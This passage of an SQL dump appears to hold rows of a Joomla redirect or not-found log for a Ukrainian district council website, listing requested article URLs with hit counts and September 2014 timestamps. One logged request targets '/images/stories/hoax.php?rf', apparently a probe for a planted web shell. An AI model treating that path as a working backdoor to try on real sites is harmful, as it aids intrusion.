00:00:00',301),(2690,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-19 23:35:02','0000-00-00 00:00:00',301),(2691,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-19 23:45:05','0000-00-00 00:00:00',301),(2692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-19 23:47:12','0000-00-00 00:00:00',301),(2693,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:--21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-19 23:47:56','0000-00-00 00:00:00',301),(2694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',13,0,'2014-09-19 23:49:36','0000-00-00 00:00:00',301),(2695,'http://malyn-rayrada.org.ua/modules/mod_yoo_accordion/mod_yoo_accordion.css.php','','','',10,0,'2014-09-19 23:51:15','0000-00-00 00:00:00',301),(2696,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36&Itemid=70&lang=uk','','','',12,0,'2014-09-19 23:52:56','0000-00-00 00:00:00',301),(2697,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-19 23:54:39','0000-00-00 00:00:00',301),(2698,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59:--20062014-&Itemid=107&lang=ru','','','',3,0,'2014-09-19 23:54:51','0000-00-00 00:00:00',301),(2699,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=ru','','','',12,0,'2014-09-19 23:55:46','0000-00-00 00:00:00',301),(2700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59&Itemid=107&lang=en','','','',2,0,'2014-09-19 23:57:41','0000-00-00 00:00:00',301),(2701,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=en','','','',6,0,'2014-09-19 23:58:44','0000-00-00 00:00:00',301),(2702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 00:00:07','0000-00-00 00:00:00',301),(2703,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=ru','','','',3,0,'2014-09-20 00:02:08','0000-00-00 00:00:00',301),(2704,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=1&lang=ru','','','',4,0,'2014-09-20 00:03:57','0000-00-00 00:00:00',301),(2705,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 00:22:42','0000-00-00 00:00:00',301),(2706,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-20 00:29:32','0000-00-00 00:00:00',301),(2707,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=uk','','','',5,0,'2014-09-20 00:36:22','0000-00-00 00:00:00',301),(2708,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&Itemid=14&lang=en','','','',11,0,'2014-09-20 00:46:49','0000-00-00 00:00:00',301),(2709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-20 00:53:21','0000-00-00 00:00:00',301),(2710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-20 00:53:34','0000-00-00 00:00:00',301),(2711,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-20 00:58:46','0000-00-00 00:00:00',301),(2712,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 01:00:15','0000-00-00 00:00:00',301),(2713,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=ru','','','',2,0,'2014-09-20 01:08:00','0000-00-00 00:00:00',301),(2714,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru','','','',4,0,'2014-09-20 01:08:50','0000-00-00 00:00:00',301),(2715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-20 01:15:18','0000-00-00 00:00:00',301),(2716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 01:21:10','0000-00-00 00:00:00',301),(2717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-20 01:21:44','0000-00-00 00:00:00',301),(2718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=uk','','','',2,0,'2014-09-20 01:23:53','0000-00-00 00:00:00',301),(2719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 01:34:15','0000-00-00 00:00:00',301),(2720,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru','','','',2,0,'2014-09-20 01:44:32','0000-00-00 00:00:00',301),(2721,'http://www.malyn-rayrada.org.ua/images/stories/hoax.php?rf','','','',3,0,'2014-09-20 01:54:18','0000-00-00 00:00:00',301),(2722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-20 01:54:21','0000-00-00 00:00:00',301),(2723,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=ru','','','',2,0,'2014-09-20 02:04:54','0000-00-00 00:00:00',301),(2724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-09-20 02:07:34','0000-00-00 00:00:00',301),(2725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 02:13:28','0000-00-00 00:00:00',301),(2726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:--21022013-&Itemid=86&lang=ru','','','',1,0,'2014-09-20 02:21:41','0000-00-00 00:00:00',301),(2727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=ru','','','',2,0,'2014-09-20 02:25:28','0000-00-00 00:00:00',301),(2728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:--------------------2013-2017-&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-20 02:25:39','0000-00-00 00:00:00',301),(2729,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-20 02:30:18','0000-00-00 00:00:00',301),(2730,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-09-20 02:31:20','0000-00-00 00:00:00',301),(2731,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2014-09-20 02:36:40','0000-00-00 00:00:00',301),(2732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=en','','','',12,0,'2014-09-20 02:40:54','0000-00-00 00:00:00',301),(2733,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=uk','','','',3,0,'2014-09-20 02:41:15','0000-00-00 00:00:00',301),(2734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-20 02:46:10','0000-00-00 00:00:00',301),(2735,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-20 02:51:51','0000-00-00 00:00:00',301),(2736,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-20 02:52:06','0000-00-00 00:00:00',301),(2737,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',8,0,'2014-09-20 02:52:09','0000-00-00 00:00:00',301),(2738,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 02:52:17','0000-00-00 00:00:00',301),(2739,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en','','','',2,0,'2014-09-20 02:53:10','0000-00-00 00:00:00',301),(2740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 02:53:50','0000-00-00 00:00:00',301),(2741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-20 02:55:50','0000-00-00 00:00:00',301),(2742,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-20 02:58:43','0000-00-00 00:00:00',301),(2743,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-20 03:01:10','0000-00-00 00:00:00',301),(2744,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-20 03:02:53','0000-00-00 00:00:00',301),(2745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-09-20 03:03:30','0000-00-00 00:00:00',301),(2746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-20 03:05:19','0000-00-00 00:00:00',301),(2747,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46:--21122012&Itemid=85&lang=uk','','','',4,0,'2014-09-20 03:06:22','0000-00-00 00:00:00',301),(2748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk','','','',5,0,'2014-09-20 03:08:15','0000-00-00 00:00:00',301),(2749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 03:09:15','0000-00-00 00:00:00',301),(2750,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=en','','','',2,0,'2014-09-20 03:10:09','0000-00-00 00:00:00',301),(2751,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 03:12:10','0000-00-00 00:00:00',301),(2752,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-20 03:13:08','0000-00-00 00:00:00',301),(2753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=uk','','','',5,0,'2014-09-20 03:16:51','0000-00-00 00:00:00',301),(2754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57:--15042014-&Itemid=98&lang=en','','','',4,0,'2014-09-20 03:17:15','0000-00-00 00:00:00',301),(2755,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-20 03:17:40','0000-00-00 00:00:00',301),(2756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-20 03:20:57','0000-00-00 00:00:00',301),(2757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=ru','','','',4,0,'2014-09-20 03:25:05','0000-00-00 00:00:00',301),(2758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-20 03:25:19','0000-00-00 00:00:00',301),(2759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=ru','','','',1,0,'2014-09-20 03:25:59','0000-00-00 00:00:00',301),(2760,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-09-20 03:26:00','0000-00-00 00:00:00',301),(2761,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-20 03:26:33','0000-00-00 00:00:00',301),(2762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-20 03:26:55','0000-00-00 00:00:00',301),(2763,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-20 03:30:39','0000-00-00 00:00:00',301),(2764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-20 03:36:12','0000-00-00 00:00:00',301),(2765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 03:36:26','0000-00-00 00:00:00',301),(2766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-20 03:37:26','0000-00-00 00:00:00',301),(2767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=5:2010-06-05-12-51-34&layout=blog&Itemid=6&lang=en','','','',10,0,'2014-09-20 03:40:25','0000-00-00 00:00:00',301),(2768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-20 03:41:21','0000-00-00 00:00:00',301),(2769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-20 03:42:37','0000-00-00 00:00:00',301),(2770,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-20 03:44:15','0000-00-00 00:00:00',301),(2771,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-09-20 03:46:09','0000-00-00 00:00:00',301),(2772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 03:47:56','0000-00-00 00:00:00',301),(2773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=36&Itemid=70&lang=en','','','',6,0,'2014-09-20 03:55:47','0000-00-00 00:00:00',301),(2774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=ru','','','',2,0,'2014-09-20 03:58:17','0000-00-00 00:00:00',301),(2775,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-09-20 04:00:30','0000-00-00 00:00:00',301),(2776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=en','','','',3,0,'2014-09-20 04:02:17','0000-00-00 00:00:00',301),(2777,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-20 04:06:19','0000-00-00 00:00:00',301),(2778,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-20 04:09:07','0000-00-00 00:00:00',301),(2779,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=uk','','','',5,0,'2014-09-20 04:09:50','0000-00-00 00:00:00',301),(2780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-20 04:14:23','0000-00-00 00:00:00',301),(2781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-20 04:14:36','0000-00-00 00:00:00',301),(2782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-20 04:14:57','0000-00-00 00:00:00',301),(2783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',35,0,'2014-09-20 04:15:13','0000-00-00 00:00:00',301),(2784,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk','','','',2,0,'2014-09-20 04:15:24','0000-00-00 00:00:00',301),(2785,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-20 04:15:39','0000-00-00 00:00:00',301),(2786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&catid=58:--30042014-&Itemid=105&lang=ru','','','',14,0,'2014-09-20 04:15:52','0000-00-00 00:00:00',301),(2787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',20,0,'2014-09-20 04:16:39','0000-00-00 00:00:00',301),(2788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',10,0,'2014-09-20 04:17:38','0000-00-00 00:00:00',301),(2789,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru','','','',3,0,'2014-09-20 04:17:46','0000-00-00 00:00:00',301),(2790,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57&Itemid=98&lang=en','','','',5,0,'2014-09-20 04:17:57','0000-00-00 00:00:00',301),(2791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-20 04:18:11','0000-00-00 00:00:00',301),(2792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57:--15042014-&Itemid=98&lang=ru','','','',12,0,'2014-09-20 04:18:31','0000-00-00 00:00:00',301),(2793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-09-20 04:18:36','0000-00-00 00:00:00',301),(2794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:-25-2011-74-19-2011-193-&catid=57&Itemid=98&lang=en','','','',2,0,'2014-09-20 04:18:41','0000-00-00 00:00:00',301),(2795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-20 04:18:47','0000-00-00 00:00:00',301),(2796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=ru','','','',9,0,'2014-09-20 04:20:07','0000-00-00 00:00:00',301),(2797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=uk','','','',6,0,'2014-09-20 04:20:31','0000-00-00 00:00:00',301),(2798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=uk','','','',14,0,'2014-09-20 04:20:36','0000-00-00 00:00:00',301),(2799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 04:20:50','0000-00-00 00:00:00',301),(2800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk','','','',6,0,'2014-09-20 04:20:58','0000-00-00 00:00:00',301),(2801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-20 04:22:52','0000-00-00 00:00:00',301),(2802,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-20 04:25:56','0000-00-00 00:00:00',301),(2803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=890:2014-01-06-08-19-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-20 04:26:54','0000-00-00 00:00:00',301),(2804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-20 04:27:48','0000-00-00 00:00:00',301),(2805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-20 04:29:18','0000-00-00 00:00:00',301),(2806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-20 04:30:41','0000-00-00 00:00:00',301),(2807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=ru','','','',13,0,'2014-09-20 04:31:42','0000-00-00 00:00:00',301),(2808,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=en','','','',2,0,'2014-09-20 04:31:46','0000-00-00 00:00:00',301),(2809,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',7,0,'2014-09-20 04:32:37','0000-00-00 00:00:00',301),(2810,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru&Itemid=','','','',7,0,'2014-09-20 04:40:13','0000-00-00 00:00:00',301),(2811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-20 04:41:46','0000-00-00 00:00:00',301),(2812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=ru','','','',16,0,'2014-09-20 04:42:36','0000-00-00 00:00:00',301),(2813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-----l---r------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-20 04:43:52','0000-00-00 00:00:00',301),(2814,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=53&Itemid=94&lang=uk','','','',4,0,'2014-09-20 04:47:44','0000-00-00 00:00:00',301),(2815,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=ru','','','',2,0,'2014-09-20 04:49:11','0000-00-00 00:00:00',301),(2816,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:-2012-2015-&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-20 04:51:07','0000-00-00 00:00:00',301),(2817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=uk','','','',5,0,'2014-09-20 04:52:39','0000-00-00 00:00:00',301),(2818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=uk','','','',3,0,'2014-09-20 04:55:18','0000-00-00 00:00:00',301),(2819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-20 05:01:49','0000-00-00 00:00:00',301),(2820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-09-20 05:15:41','0000-00-00 00:00:00',301),(2821,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 05:17:21','0000-00-00 00:00:00',301),(2822,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-20 05:20:34','0000-00-00 00:00:00',301),(2823,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-20 05:22:40','0000-00-00 00:00:00',301),(2824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 05:28:22','0000-00-00 00:00:00',301),(2825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1082:------------2012-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 05:32:10','0000-00-00 00:00:00',301),(2826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-20 05:38:43','0000-00-00 